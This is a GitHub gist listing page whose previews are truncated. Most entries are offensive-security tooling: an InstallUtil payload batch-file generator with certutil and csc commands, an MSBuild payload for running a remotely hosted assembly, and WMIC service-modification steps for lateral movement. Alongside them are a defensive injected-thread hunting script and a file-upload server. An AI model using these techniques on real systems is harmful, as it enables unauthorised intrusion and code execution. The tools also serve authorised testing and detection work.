Piotr Marszalik addenial
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //Add For PowerShell Invocation | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; |
addenial
/ Get-InjectedThread.ps1
Created
April 20, 2017 19:05
— forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-InjectedThread | |
| { | |
| <# | |
| .SYNOPSIS | |
| Looks for threads that were created as a result of code injection. | |
| .DESCRIPTION | |
addenial
/ tc2smugglebus.sh
Created
March 12, 2019 20:40
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo 'Enter device mount point (example "/media/root/960fec6a-fdf0-429d-a35c-5c7f4f6af5a4")' | |
| read mount | |
| #download necessary packages | |
| mkdir $mount/tce/optional | |
| wget http://distro.ibiblio.org/tinycorelinux/8.x/x86/tcz/python.tcz -P $mount/tce/optional/ | |
| wget http://distro.ibiblio.org/tinycorelinux/8.x/x86/tcz/openssl.tcz -P $mount/tce/optional/ | |
| wget http://distro.ibiblio.org/tinycorelinux/8.x/x86/tcz/ntfs-3g.tcz -P $mount/tce/optional/ | |
| wget http://distro.ibiblio.org/tinycorelinux/8.x/x86/tcz/scsi-4.8.17-tinycore.tcz -P $mount/tce/optional/ |
addenial
/ tc2smugglebus.sh
Last active
March 12, 2019 21:28
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo 'Enter device mount point (example "/media/root/960fec6a-fdf0-429d-a35c-5c7f4f6af5a4")' | |
| read mount | |
| #download necessary packages | |
| mkdir $mount/tce/optional | |
| wget http://distro.ibiblio.org/tinycorelinux/8.x/x86/tcz/python.tcz -P $mount/tce/optional/ | |
| wget http://distro.ibiblio.org/tinycorelinux/8.x/x86/tcz/openssl.tcz -P $mount/tce/optional/ | |
| wget http://distro.ibiblio.org/tinycorelinux/8.x/x86/tcz/ntfs-3g.tcz -P $mount/tce/optional/ | |
addenial
/ New-InstallUtilBatchFile.ps1
Created
August 19, 2019 16:18
— forked from xorrior/New-InstallUtilBatchFile.ps1
Generate InstallUtil payload within batch file for delivery
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function New-InstallUtilBatchFile | |
| { | |
| <##> | |
| #You must provide an encoded payload using certutil -encode for the InFilePath. | |
| #certutil -encode payload.exe payload.txt | |
| #For compiling w/ a managed powershell runner | |
| # C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:payload.exe payload.cs | |
| [CmdletBinding()] | |
| param | |
| ( |
addenial
/ SimpleHTTPServerWithUpload.py
Created
September 21, 2022 15:01
— forked from touilleMan/SimpleHTTPServerWithUpload.py
Simple Python Http Server with Upload - Python3 version
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """Simple HTTP Server With Upload. | |
| This module builds on BaseHTTPServer by implementing the standard GET | |
| and HEAD requests in a fairly straightforward manner. | |
| see: https://gist.github.com/UniIsland/3346170 | |
| """ | |
addenial
/ msBuildDemo.xml
Created
September 29, 2022 05:40
— forked from G0ldenGunSec/msBuildDemo.xml
MSBuild payload used to execute a remotely-hosted .net assembly
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <Target Name="DemoClass"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask | |
| TaskName="ClassExample" | |
| TaskFactory="CodeTaskFactory" | |
| AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
| <Task> | |
| <Code Type="Class" Language="cs"> |
addenial
/ wmicLateralMovement.txt
Last active
September 29, 2022 17:42
— forked from G0ldenGunSec/wmicLateralMovement.txt
WMIC Service Modification for Lateral Movement
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| As always, only for use on networks you own or have permission to test against. | |
| Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely. | |
| If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well. | |
| The process involves a total of four commands, three of which can be combined on the command line to form one large block. | |
| Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager) | |
| wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName |